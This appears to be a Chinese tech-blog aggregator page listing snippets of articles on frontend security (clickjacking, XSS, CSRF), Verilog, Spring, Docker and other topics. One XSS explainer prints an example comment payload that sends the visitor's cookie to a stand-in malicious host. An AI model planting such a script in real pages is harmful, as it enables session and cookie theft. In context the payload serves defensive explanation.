- web前端安全性——iframe安全问题
장숙혜
前端安全性前端安全
1、概念iframe安全问题可称作界面劫持,像点击劫持、拖放劫持、触屏劫持。就是我们的点击,拖放,触屏操作被劫持了,而去操作了其它的透明隐藏的界面。**原理是利用透明层iframe,使用了CSS中的opacity或z-index等属性,来到达透明和位于其它界面的上方,然后使用iframe来嵌入劫持页面。**到达了用户操作的不是它看到的界面,不是他以为的那个界面,而是那个透明的位于上层的界面。代码:
- 前端安全字体
IT杨
serif类font-family:Garamond,serif;font-family:Georgia,serif;font-family:'TimesNewRoman',Times,serif;font-family:'BookmanOldStyle',serif;font-family:'PalatinoLinotype','BookAntiqua',Palatino,serif;2.san
- [vue源码01] data响应式 和 初始化渲染
woow_wu7
导航[深入01]执行上下文[深入02]原型链[深入03]继承[深入04]事件循环[深入05]柯里化偏函数函数记忆[深入06]隐式转换和运算符[深入07]浏览器缓存机制(http缓存机制)[深入08]前端安全[深入09]深浅拷贝[深入10]DebounceThrottle[深入11]前端路由[深入12]前端模块化[深入13]观察者模式发布订阅模式双向数据绑定[深入14]canvas[深入15]web
- 【芯片设计- RTL 数字逻辑设计入门 11 -- 移位运算与乘法】
CodingCos
芯片设计RTL数字逻辑设计扫盲fpga开发移位运算与乘法FPGA
请阅读【嵌入式开发学习必备专栏】文章目录移位运算与乘法VerilogCodeverilog拼接运算符({})TestbenchCodeVCS波形仿真问题小结移位运算与乘法已知d为一个8位数,请在每个时钟周期分别输出该数乘1/3/7/8,并输出一个信号通知此时刻输入的d有效(d给出的信号的上升沿表示写入有效)可以看到输入D的波形在为6的地方比较特殊,从波形上可以看到它只持续了一个时钟周期,但是out
- Springboot集成flowable工作流
快乐的木子李
#工作流技术栈springboot后端
文章目录概要包依赖问题小结概要Spirngboot集成flowable3.1.5包依赖org.flowableflowable-spring-boot-starter7.0.1使用7.0.1版本问题项目启动初始化flowable表结构异常.原因如下:mysql8.xxx以上驱动会出现这个问题mysql使用schema标识库名而不是catalog,因此mysql会扫描所有的库来找表,如果其他库中有相
- 前端安全问题总结
大唐荣华
大前端前端安全网络安全CORSxssdos
XSS攻击Cross-SiteScripting(跨站脚本攻击)简称XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如Cookie、SessionID等,进而危害数据安全。所以,网页上哪些部分会引起XSS攻击?简单来说,任何可以输入的地方都有可能引起,包括URL!常见的注入方法在HTML中内嵌的文本中,恶意内容以
- 【芯片设计- RTL 数字逻辑设计入门 6 -- 带同步复位的D触发器 RTL实现及testbench 验证】
CodingCos
芯片设计RTL数字逻辑设计扫盲fpga开发
文章目录带同步复位的D触发器Verilog代码testbench代码编译及仿真问题小结带同步复位的D触发器同步复位:复位只能发生在在clk信号的上升沿,若clk信号出现问题,则无法进行复位。Verilog代码//timescaleins/1nsmoduleflopr(inputrstn,inputclk,input[3:0]d,output[3:0]q);reg[3:0]q_out;//synch
- [深入02] 原型链
woow_wu7
导航2021/07/21更新constructor.png2021/07/22更新原型链.png[深入01]执行上下文[深入02]原型链[深入03]继承[深入04]事件循环[深入05]柯里化偏函数函数记忆[深入06]隐式转换和运算符[深入07]浏览器缓存机制(http缓存机制)[深入08]前端安全[深入09]深浅拷贝[深入10]DebounceThrottle[深入11]前端路由[深入12]前端模
- 前端安全防范措施,xss攻击和csrf攻击
_咻咻咻咻咻
xss跨站脚本攻击简单来说,就是攻击者想办法将可执行的代码注入页面。分为持久性和非持久性。持久性就是攻击的代码被存入了数据库,会导致大量用户网页被攻击。eg:input框中写入alert(1),如果前后端没有防御,被存入数据库,每个打开该页面的用户都会被攻击。如何防御?转义字符functionescape(str){str=str.replace(/&/g,'&');str=str.replace
- 2024 高级前端面试题之 前端安全模块 「精选篇」
八了个戒
前端面试面试宝典大前端前端安全前端框架面试大前端web安全xss
该内容主要整理关于前端安全模块的相关面试题,其他内容面试题请移步至「最新最全的前端面试题集锦」查看。前端安全模块精选篇1.代码注入XSS如何攻击如何防御cookie如何防范XSS攻击2.跨站请求伪造CSRF3.浏览器同源策略SOP4.跨域资源共享CORS5.密码安全1.代码注入XSS跨网站指令码(英语:Cross-sitescripting,通常简称为:XSS)是一种网站应用程式的安全漏洞攻击,是
- Docker应用之daemon.json(一)
刘一说
软件环境实战总结springboot学习springbootdocker容器java
目录问题复现原因分析解决步骤1.创建daemon.json2.国内镜像地址3.保存daemon.json4.重启docker服务5.查看镜像源问题小结官网docs提供的一个示例配置参数背景说明问题复现今天在用docker部署springboot项目时,出现JDK8依赖包下载失败,原因分析第一时间想到可能是镜像源地址导致的。查看docker镜像源配置文件:cat/etc/docker/daemon.
- [深入19] 手写Promise
woow_wu7
image导航[深入01]执行上下文[深入02]原型链[深入03]继承[深入04]事件循环[深入05]柯里化偏函数函数记忆[深入06]隐式转换和运算符[深入07]浏览器缓存机制(http缓存机制)[深入08]前端安全[深入09]深浅拷贝[深入10]DebounceThrottle[深入11]前端路由[深入12]前端模块化[深入13]观察者模式发布订阅模式双向数据绑定[深入14]canvas[深入1
- 前端安全之XSS、CSRF
菊の物语
前端安全xss
XSS(cross-site-script)跨站脚本攻击跨站脚本攻击是通过在网站中注入恶意代码,来达到劫取用户cookie信息,或者实施其他破坏行动。例如:一个网站如果没有针对XSS做响应的安全措施,而且它存在添加评论的功能,那么用户可以在添加评论时输入如下文本varxhr=newXMLHttpRequest();xhr.open('GET','http://恶意网站.com/steal?cook
- Flowable使用docker中MySQL8,Springboot启动出错
刘一说
springboot软件环境实战总结springbootdockerjava
目录问题复现原因分析解决办法修改MYSQL大小写敏感配置问题小结docker的优点:问题复现最近在将项目迁至docker环境时,出现启动时失败,报错信息如下:Causedby:org.springframework.beans.factory.BeanCreationException:Errorcreatingbeanwithname'processEngine':FactoryBeanthre
- (SPP-Net)CNN处理图片时resize图片尺寸的问题小结
kgbkqLjm
DeepLearning
目前已知SPP和RoIpoolingCNN中卷积层Conv_Layer对图片size并没有限制,而全连接层FC_Layer则相反.SPP-Net(空间金字塔池化网络)背景SPP-Net是出自2015年发表在IEEE上的论文-《SpatialPyramidPoolinginDeepConvolutionalNetworksforVisualRecognition》.在SPP诞生之前,所有的神经网络都
- 【ARMv8M Cortex-M33 系列 7 -- RA4M2 移植 RT-Thread 问题总结】
CodingCos
#【ARMv8MM33专栏】RA4M2rt-thread
请阅读【嵌入式开发学习必备专栏】文章目录问题小结栈未对齐经过几天的调试,成功将rt-thead移植到RA4M2(Cortex-M33核)上,thread和shell命令已经都成功支持。问题小结在完成rt-thread代码Makefile编译系统搭建后,就开始着手rt-threadOS的移植,不幸的是开始就遇到了问题:cortex-m33/context_gcc.S在退出PendSV_Handler
- 前端安全
强某某
XSScsrfxss其实都是针对session(cookie)攻击的,只要登出则这些都无效了CrossSiteScripting跨站脚本攻击XSS(Cross-SiteScripting),跨站脚本攻击,因为缩写和CSS重叠,所以只能叫XSS。跨站脚本攻击是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的非本站点HTML标签或JavaScript进行的一种攻击。跨站脚本攻击有可能造成以下
- 探索去中心化应用:技术挑战与未来趋势
AigcFox
去中心化区块链
去中心化应用(DApps)在技术上面临着一系列挑战和难题,这些挑战涉及到安全性、性能、用户体验、跨平台兼容性等多个方面。以下是一些主要的挑战:安全性:智能合约漏洞:智能合约代码可能存在漏洞或错误,导致资金损失或数据泄露。共识机制攻击:去中心化系统的共识机制可能遭受攻击,如51%攻击(在PoW系统中)、Sybil攻击(在基于权益证明的系统中)等。前端安全:前端界面可能遭受XSS攻击、CSRF攻击等,
- 前端安全相关
它经不起推敲的
前端安全
请求后端接口必须带上sign以上主要是解决:除了数据泄露外,一些重要功能的接口如果没有做好保护措施也会被恶意调用造成DDoS、条件竞争等攻击效果一些营销活动类的Web页面,领红包、领券、投票、抽奖等活动方式很常见。此类活动对于普通用户来说应该是“拼手气”,而对于非正常用户来说,可以通过直接刷活动API接口的这种“作弊”方式来提升“手气”。这样对普通用户来说就很不公平登录密码使用sha256加密后传
- [2017专题] 前端安全
weixin_34114823
前端爬虫数据库ViewUI
过往专题搬运。前端安全开发视角反击爬虫,前端工程师的脑洞可以有多大?预防竞争对手用爬虫进行的信息抓取,我们除了可以在后端进行图灵测试,也可以前端在DOM处做手脚来混淆爬虫。前端防御之CSP详解针对XSS的前端防御,本文作者介绍了CSP的作用与绕过方式,最后给出结论:黑名单配合CSP仍然是最靠谱的防御方式。点击劫持小抄介绍了预防点击劫持的多个方案汇总。XSSCookBook介绍了XSS的3个分类与2
- 前端安全专题
️不倒翁
前端集合前端安全javascript
xss(CrossSiteScripting)跨站脚本攻击原理通常指黑客通过"HTML注入"篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。常见攻击类型存储型XSS攻击者将恶意的JavaScript脚本存储在网站的服务器上(例如,在一个评论区中发布含有恶意脚本的评论)。当其他用户浏览到包含这些脚本的页面时,就会执行这些脚本。反射型XSS反射型XSS只是简单地把用户输入
- Java:多线程问题小结(二)
dingcho
Javajava开发语言
21、FutureTask是什么这是一个比较偏实践的问题,这种问题我觉得挺有意义的。可以这么做:(1)获取项目的pid,jps或者ps-ef|grepjava,这个前面有讲过(2)top-H-ppid,顺序不能改变这样就可以打印出当前的项目,每条线程占用CPU时间的百分比。注意这里打出的是LWP,也就是操作系统原生线程的线程号,我笔记本山没有部署Linux环境下的Java工程,因此没有办法截图演示
- JavaScript系列——闭包
爱喝酸奶的一旬
JavaScriptjavascript开发语言前端
文章目录闭包定义词法作用域闭包示例使用场景创建私有变量ES5中,解决循环变量的作用域问题小结闭包定义闭包,是函数及其关联的周边环境的引用的组合,在闭包里面,内部函数可以访问外部函数的作用域,而外部函数不能范围内部函数的作用域,从而在内部函数形成一个相对封闭的环境。在JavaScript中,闭包随着函数创建而被创建。词法作用域词法作用域指的是在源码声明的变量,能够起作用的环境范围,一般是从变量所定义
- 9.云原生存储之ceph在k8s中应用及问题处理
野心与梦
私有云搭建实战云原生cephkubernetes
文章目录ceph应用场景ceph应用在k8s集群外使用块设备ceph客户端配置创建块挂载使用删除pool在k8s集群内使用块设备创建块池和StorageClass使用存储块存储映射问题处理问题现象事件分析csi-rbdpluginpod日志分析问题小结CentOS7编译安装nbd模块nbd内核模块介绍安装nbd模块重新使用块存储验证升级centos验证验证小结操作系统选择考虑Rocky8替换k8s
- XSS攻击以及java应对措施
jakiechaipush
Java零碎知识点罗列xssjava安全
文章目录一.XSS攻击介绍1.前端安全2.xss攻击简介3.xss的攻击方式二.java应对xss攻击的解决方案1.强制修改html敏感标签内容2.利用过滤器过滤非法html标签一.XSS攻击介绍1.前端安全随着互联网的高速发展,信息安全问题已经成为企业最为关注的焦点之一,而前端又是引发企业安全问题的高危据点。在移动互联网时代,前端人员除了传统的XSS、CSRF等安全问题之外,又时常遭遇网络劫持、
- 前端安全,常见的攻击类型以及如何防御
一月清辉
javascript前端安全
文章目录1、CSRF攻击1.1、什么是CSRF攻击1.2、CSRF攻击的过程1.3、如何防御CSRF攻击2、XSS攻击2.1、XSS攻击是什么2.2、XSS攻击有哪些类型2.3、XSS攻击可以进行以下操作2.4、如何防御XSS攻击3、token为什么就比cookie安全4、cookie、token是什么5、有哪些可能引起前端安全的问题?6、网络劫持有哪几种,如何防范?7、浏览器渲染进程的线程有哪些
- 前端安全:几种攻击模式
error_log
前端安全
1.XSS攻击主要是注入js代码,通过将js代码存入数据库或者通过修改URL参数的方式加入攻击代码,诱导用户访问链接从而进行攻击。防御措施:对字符串进行转义通常来说主要针对script标签进行转义functionescape(str){str=str.replace(/&/g,'&');str=str.replace(//g,'>');str=str.replace(/"/g,'&quto;');
- 前端安全- 常见的网络攻击
姜慧慧
前端工程前端安全web安全
1.xss攻击跨站脚本攻击1.1反射性攻击url参数直接注入(地址栏运行脚本)1.2影响利用虚假输入表单骗取用户个人信息利用脚本窃取用户的cookie值,被害者在不知情的情况下,帮助攻击者发送恶意请求显示伪造的文章或图片1.3存储型攻击存储到DB读取时注入1.4防御ctx.set(‘X-XSS-Protect’,‘0’)csp内容安全策略;白名单法:xss库,找到允许的代码;黑名单法:script
- 前端安全—常见的攻击方式及防御方法
WLANQY
前端安全网络攻击模型安全架构可信计算技术
Cookie挟持HTTP是无状态的协议,为了维持和跟踪用户的状态,引入了Cookie和Session。Cookie包含了浏览器客户端的用户凭证,相对较小。Session则维护在服务器,用于维护相对较大的用户信息。可以把Cookie当成密码,而Session是保险柜。由于HTTP是明文传输,Cookie很容易被盗取,如果被盗取,别人就可以冒充你的身份,打开你的保险柜,获取你的信息,动用你的资金,这是
- 前端常见安全问题
NJR10byh
笔记前端安全javascript
目录以下是对一些常见的前端安全问题的总结一、iframe1、防止自己的网站不被其他网站的iframe引用2、禁用被使用的iframe对当前网站某些操作二、opener1、target="_blank"2、window.open()三、CSRF/XSRF(跨站请求伪造)防御措施四、XSS/CSS(跨站脚本攻击)XSS类型:防御措施(对用户输入内容和服务端返回内容进行过滤和转译)五、ClickJack
- [星球大战]阿纳金的背叛
comsci
本来杰迪圣殿的长老是不同意让阿纳金接受训练的.........
但是由于政治原因,长老会妥协了...这给邪恶的力量带来了机会
所以......现代的地球联邦接受了这个教训...绝对不让某些年轻人进入学院
- 看懂它,你就可以任性的玩耍了!
aijuans
JavaScript
javascript作为前端开发的标配技能,如果不掌握好它的三大特点:1.原型 2.作用域 3. 闭包 ,又怎么可以说你学好了这门语言呢?如果标配的技能都没有撑握好,怎么可以任性的玩耍呢?怎么验证自己学好了以上三个基本点呢,我找到一段不错的代码,稍加改动,如果能够读懂它,那么你就可以任性了。
function jClass(b
- Java常用工具包 Jodd
Kai_Ge
javajodd
Jodd 是一个开源的 Java 工具集, 包含一些实用的工具类和小型框架。简单,却很强大! 写道 Jodd = Tools + IoC + MVC + DB + AOP + TX + JSON + HTML < 1.5 Mb
Jodd 被分成众多模块,按需选择,其中
工具类模块有:
jodd-core &nb
- SpringMvc下载
120153216
springMVC
@RequestMapping(value = WebUrlConstant.DOWNLOAD)
public void download(HttpServletRequest request,HttpServletResponse response,String fileName) {
OutputStream os = null;
InputStream is = null;
- Python 标准异常总结
2002wmj
python
Python标准异常总结
AssertionError 断言语句(assert)失败 AttributeError 尝试访问未知的对象属性 EOFError 用户输入文件末尾标志EOF(Ctrl+d) FloatingPointError 浮点计算错误 GeneratorExit generator.close()方法被调用的时候 ImportError 导入模块失
- SQL函数返回临时表结构的数据用于查询
357029540
SQL Server
这两天在做一个查询的SQL,这个SQL的一个条件是通过游标实现另外两张表查询出一个多条数据,这些数据都是INT类型,然后用IN条件进行查询,并且查询这两张表需要通过外部传入参数才能查询出所需数据,于是想到了用SQL函数返回值,并且也这样做了,由于是返回多条数据,所以把查询出来的INT类型值都拼接为了字符串,这时就遇到问题了,在查询SQL中因为条件是INT值,SQL函数的CAST和CONVERST都
- java 时间格式化 | 比较大小| 时区 个人笔记
7454103
javaeclipsetomcatcMyEclipse
个人总结! 不当之处多多包含!
引用 1.0 如何设置 tomcat 的时区:
位置:(catalina.bat---JAVA_OPTS 下面加上)
set JAVA_OPT
- 时间获取Clander的用法
adminjun
Clander时间
/**
* 得到几天前的时间
* @param d
* @param day
* @return
*/
public static Date getDateBefore(Date d,int day){
Calend
- JVM初探与设置
aijuans
java
JVM是Java Virtual Machine(Java虚拟机)的缩写,JVM是一种用于计算设备的规范,它是一个虚构出来的计算机,是通过在实际的计算机上仿真模拟各种计算机功能来实现的。Java虚拟机包括一套字节码指令集、一组寄存器、一个栈、一个垃圾回收堆和一个存储方法域。 JVM屏蔽了与具体操作系统平台相关的信息,使Java程序只需生成在Java虚拟机上运行的目标代码(字节码),就可以在多种平台
- SQL中ON和WHERE的区别
avords
SQL中ON和WHERE的区别
数据库在通过连接两张或多张表来返回记录时,都会生成一张中间的临时表,然后再将这张临时表返回给用户。 www.2cto.com 在使用left jion时,on和where条件的区别如下: 1、 on条件是在生成临时表时使用的条件,它不管on中的条件是否为真,都会返回左边表中的记录。
- 说说自信
houxinyou
工作生活
自信的来源分为两种,一种是源于实力,一种源于头脑.实力是一个综合的评定,有自身的能力,能利用的资源等.比如我想去月亮上,要身体素质过硬,还要有飞船等等一系列的东西.这些都属于实力的一部分.而头脑不同,只要你头脑够简单就可以了!同样要上月亮上,你想,我一跳,1米,我多跳几下,跳个几年,应该就到了!什么?你说我会往下掉?你笨呀你!找个东西踩一下不就行了吗?
无论工作还
- WEBLOGIC事务超时设置
bijian1013
weblogicjta事务超时
系统中统计数据,由于调用统计过程,执行时间超过了weblogic设置的时间,提示如下错误:
统计数据出错!
原因:The transaction is no longer active - status: 'Rolling Back. [Reason=weblogic.transaction.internal
- 两年已过去,再看该如何快速融入新团队
bingyingao
java互联网融入架构新团队
偶得的空闲,翻到了两年前的帖子
该如何快速融入一个新团队,有所感触,就记下来,为下一个两年后的今天做参考。
时隔两年半之后的今天,再来看当初的这个博客,别有一番滋味。而我已经于今年三月份离开了当初所在的团队,加入另外的一个项目组,2011年的这篇博客之后的时光,我很好的融入了那个团队,而直到现在和同事们关系都特别好。大家在短短一年半的时间离一起经历了一
- 【Spark七十七】Spark分析Nginx和Apache的access.log
bit1129
apache
Spark分析Nginx和Apache的access.log,第一个问题是要对Nginx和Apache的access.log文件进行按行解析,按行解析就的方法是正则表达式:
Nginx的access.log解析正则表达式
val PATTERN = """([^ ]*) ([^ ]*) ([^ ]*) (\\[.*\\]) (\&q
- Erlang patch
bookjovi
erlang
Totally five patchs committed to erlang otp, just small patchs.
IMO, erlang really is a interesting programming language, I really like its concurrency feature.
but the functional programming style
- log4j日志路径中加入日期
bro_feng
javalog4j
要用log4j使用记录日志,日志路径有每日的日期,文件大小5M新增文件。
实现方式
log4j:
<appender name="serviceLog"
class="org.apache.log4j.RollingFileAppender">
<param name="Encoding" v
- 读《研磨设计模式》-代码笔记-桥接模式
bylijinnan
java设计模式
声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/
/**
* 个人觉得关于桥接模式的例子,蜡笔和毛笔这个例子是最贴切的:http://www.cnblogs.com/zhenyulu/articles/67016.html
* 笔和颜色是可分离的,蜡笔把两者耦合在一起了:一支蜡笔只有一种
- windows7下SVN和Eclipse插件安装
chenyu19891124
eclipse插件
今天花了一天时间弄SVN和Eclipse插件的安装,今天弄好了。svn插件和Eclipse整合有两种方式,一种是直接下载插件包,二种是通过Eclipse在线更新。由于之前Eclipse版本和svn插件版本有差别,始终是没装上。最后在网上找到了适合的版本。所用的环境系统:windows7JDK:1.7svn插件包版本:1.8.16Eclipse:3.7.2工具下载地址:Eclipse下在地址:htt
- [转帖]工作流引擎设计思路
comsci
设计模式工作应用服务器workflow企业应用
作为国内的同行,我非常希望在流程设计方面和大家交流,刚发现篇好文(那么好的文章,现在才发现,可惜),关于流程设计的一些原理,个人觉得本文站得高,看得远,比俺的文章有深度,转载如下
=================================================================================
自开博以来不断有朋友来探讨工作流引擎该如何
- Linux 查看内存,CPU及硬盘大小的方法
daizj
linuxcpu内存硬盘大小
一、查看CPU信息的命令
[root@R4 ~]# cat /proc/cpuinfo |grep "model name" && cat /proc/cpuinfo |grep "physical id"
model name : Intel(R) Xeon(R) CPU X5450 @ 3.00GHz
model name :
- linux 踢出在线用户
dongwei_6688
linux
两个步骤:
1.用w命令找到要踢出的用户,比如下面:
[root@localhost ~]# w
18:16:55 up 39 days, 8:27, 3 users, load average: 0.03, 0.03, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
- 放手吧,就像不曾拥有过一样
dcj3sjt126com
内容提要:
静悠悠编著的《放手吧就像不曾拥有过一样》集结“全球华语世界最舒缓心灵”的精华故事,触碰生命最深层次的感动,献给全世界亿万读者。《放手吧就像不曾拥有过一样》的作者衷心地祝愿每一位读者都给自己一个重新出发的理由,将那些令你痛苦的、扛起的、背负的,一并都放下吧!把憔悴的面容换做一种清淡的微笑,把沉重的步伐调节成春天五线谱上的音符,让自己踏着轻快的节奏,在人生的海面上悠然漂荡,享受宁静与
- php二进制安全的含义
dcj3sjt126com
PHP
PHP里,有string的概念。
string里,每个字符的大小为byte(与PHP相比,Java的每个字符为Character,是UTF8字符,C语言的每个字符可以在编译时选择)。
byte里,有ASCII代码的字符,例如ABC,123,abc,也有一些特殊字符,例如回车,退格之类的。
特殊字符很多是不能显示的。或者说,他们的显示方式没有标准,例如编码65到哪儿都是字母A,编码97到哪儿都是字符
- Linux下禁用T440s,X240的一体化触摸板(touchpad)
gashero
linuxThinkPad触摸板
自打1月买了Thinkpad T440s就一直很火大,其中最让人恼火的莫过于触摸板。
Thinkpad的经典就包括用了小红点(TrackPoint)。但是小红点只能定位,还是需要鼠标的左右键的。但是自打T440s等开始启用了一体化触摸板,不再有实体的按键了。问题是要是好用也行。
实际使用中,触摸板一堆问题,比如定位有抖动,以及按键时会有飘逸。这就导致了单击经常就
- graph_dfs
hcx2013
Graph
package edu.xidian.graph;
class MyStack {
private final int SIZE = 20;
private int[] st;
private int top;
public MyStack() {
st = new int[SIZE];
top = -1;
}
public void push(i
- Spring4.1新特性——Spring核心部分及其他
jinnianshilongnian
spring 4.1
目录
Spring4.1新特性——综述
Spring4.1新特性——Spring核心部分及其他
Spring4.1新特性——Spring缓存框架增强
Spring4.1新特性——异步调用和事件机制的异常处理
Spring4.1新特性——数据库集成测试脚本初始化
Spring4.1新特性——Spring MVC增强
Spring4.1新特性——页面自动化测试框架Spring MVC T
- 配置HiveServer2的安全策略之自定义用户名密码验证
liyonghui160com
具体从网上看
http://doc.mapr.com/display/MapR/Using+HiveServer2#UsingHiveServer2-ConfiguringCustomAuthentication
LDAP Authentication using OpenLDAP
Setting
- 一位30多的程序员生涯经验总结
pda158
编程工作生活咨询
1.客户在接触到产品之后,才会真正明白自己的需求。
这是我在我的第一份工作上面学来的。只有当我们给客户展示产品的时候,他们才会意识到哪些是必须的。给出一个功能性原型设计远远比一张长长的文字表格要好。 2.只要有充足的时间,所有安全防御系统都将失败。
安全防御现如今是全世界都在关注的大课题、大挑战。我们必须时时刻刻积极完善它,因为黑客只要有一次成功,就可以彻底打败你。 3.
- 分布式web服务架构的演变
自由的奴隶
linuxWeb应用服务器互联网
最开始,由于某些想法,于是在互联网上搭建了一个网站,这个时候甚至有可能主机都是租借的,但由于这篇文章我们只关注架构的演变历程,因此就假设这个时候已经是托管了一台主机,并且有一定的带宽了,这个时候由于网站具备了一定的特色,吸引了部分人访问,逐渐你发现系统的压力越来越高,响应速度越来越慢,而这个时候比较明显的是数据库和应用互相影响,应用出问题了,数据库也很容易出现问题,而数据库出问题的时候,应用也容易
- 初探Druid连接池之二——慢SQL日志记录
xingsan_zhang
日志连接池druid慢SQL
由于工作原因,这里先不说连接数据库部分的配置,后面会补上,直接进入慢SQL日志记录。
1.applicationContext.xml中增加如下配置:
<bean abstract="true" id="mysql_database" class="com.alibaba.druid.pool.DruidDataSourc